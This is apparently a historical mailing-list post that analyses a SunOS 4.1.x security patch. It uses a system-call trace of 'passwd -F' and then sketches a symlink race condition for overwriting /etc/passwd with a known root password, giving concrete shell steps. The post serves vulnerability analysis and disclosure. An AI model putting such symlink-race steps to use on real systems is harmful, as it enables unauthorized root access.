> So does anybody know more about this one??? I've tried a few things, > but haven't figured it out yet. [...] > Problem Description: > 1169007: Security: Root access possible on SunOS 4.1.x via forced passwd > race condition. > This patch restricts the use of the passwd command's -F option [...] I just now did a simple experiment: I copied /etc/passwd to /tmp/gleep and ran "passwd -F /tmp/gleep" under the control of trc. Here's the trace, edited to emphasize the relevant excerpts: open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 3 [this is the first time /tmp/gleep appears in the trace] fstat (3, 0xf7fff704) = 0 read (3, 0xc708, 8192) = 448: [the passwd file] close (3) = 0 gethostname (0x9ae0, 64) = 0: [our hostname] ioctl (1, 0x40125401=TCGETA, 0xf7ffefe4) = 0: tio=[...] write (1, 0xf78028d0="Changing password for mouse on [hostname].\n", 58) = 58 access (0xf77247d7="/etc/security/passwd.adjunct", 0x0=F_OK) = -1 ENOENT (No such file or directory) [I don't know how this may interact with shadow passwords.] open (0xf7723ae5="/dev/tty", 0x0=O_RDONLY) = 3 [catch SIGINT] [frob tty settings] [read new password] [do it all over again, for second copy of new password] [do a bunch of signal stuff: SIGHUP, SIGINT, SIGQUIT, SIGTSTP] umask (0000) = 0022 open (0xcb80="/tmp/ptmp", 0xa01=O_WRONLY|O_CREAT|O_EXCL, 0644) = 3 [experimentation indicates the directory portion is taken from /tmp/gleep's directory portion] getdtablesize () = 64 setrlimit (0x0=RLIMIT_CPU, 0xf7fff878=cur=INFINITY max=INFINITY) = 0 setrlimit (0x1=RLIMIT_FSIZE, 0xf7fff878=cur=INFINITY max=INFINITY) = 0 open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 4 fstat (4, 0xf7fff7dc) = 0 read (4, 0xcb98, 8192) = 448: [the passwd file] fstat (3, 0xf7fff058) = 0 read (4, 0xcb98, 8192) = 0: close (4) = 0 write (3, 0xeba0=[the passwd file with modified entry], 448) = 448 close (3) = 0 rename (0xcb80="/tmp/ptmp", 0xf7fffa2e="/tmp/gleep") = 0 Thus, my idea of how one can exploit this is [note: this is not an exploit script!] would be: % mkdir bar % cp /etc/passwd bar [edit bar/passwd to have a known root password] % ln -s /etc foo % passwd -F $cwd/foo/passwd Now, you need to relink foo to point to bar, somewhere between the open of $cwd/foo/ptmp and the open of $cwd/tmp/passwd, and then relink it back before the rename() occurs. If the passwd file is large, hitting the second window may not be hard. der Mouse mouse@collatz.mcrcim.mcgill.edu